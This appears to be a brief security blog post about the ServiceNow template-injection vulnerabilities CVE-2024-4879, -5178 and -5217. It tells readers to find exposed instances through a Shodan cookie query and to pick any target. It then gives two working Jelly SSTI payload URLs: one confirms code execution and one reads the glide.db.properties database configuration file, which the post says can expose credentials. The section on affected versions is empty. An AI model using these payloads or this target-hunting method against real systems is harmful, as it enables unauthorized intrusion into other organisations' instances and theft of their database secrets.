ServiceNow Template Injection Vulnerability: CVE-2024–4879,
CVE-2024–5178, CVE-2024–5217
ServiceNow is a comprehensive platform for business transformation, offering a wide range of modules that can be utilized for various purposes such as HR and employee management, automation workflows, and serving as a knowledge base.
Multiple Vulnerabilities have been observed in ServiceNow that allows full database access and full access to any MID servers configured.
The following CVEs were assigned for these issues:
CVE-2024–4879
CVE-2024–5178
CVE-2024–5217
In today’s blog we will see what components are affected, how we can exploit this vulnerability.
Affected Components/versions:
How to hunt, reproduce and verify the vulnerability?
Step 1: Check for the query in shodan (Set-Cookie: glide_user=””) to get the list of IPs where the affected instances of ServiceNow are hosted.
Step 2: Pick any of the target and open the instance in the browser.
Step 3: Add the URL with the SSTI payload to check if the application is responding with the desired results. It has been observed that the SSTI payload is getting executed.
Payload URL: https://xx.xx.xx.xx/login.do?jvar_page_title=<style><j:jelly%20xmlns:j=”jelly”%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
Step 3: Let’s try to check if we can access the details related to database. It has been observed that we can access full database details (In some cases we can also fetch credentials)
Payload URL: https://xx.xx.xx.xx/login.do?jvar_page_title=<style><j:jelly%20xmlns:j=”jelly:core”%20xmlns:g=%27glide%27><g:evaluate>z=new%20Packages.java.io.File(“”).getAbsolutePath();z=z.substring(0,z.lastIndexOf(“/”));u=new%20SecurelyAccess(z.concat(“/co..nf/glide.db.properties”)).getBufferedReader();s=””;while((q=u.readLine())!==null)s=s.concat(q,”%5Cn”);gs.addErrorMessage(s);</g:evaluate></j:jelly></style>”
Want to learn more and dig deeper?
I would suggest to go through the below-mentioned articles.
Let’s connect:
Linkedin: https://www.linkedin.com/in/vaibhav-kumar-srivastava-378742a9/
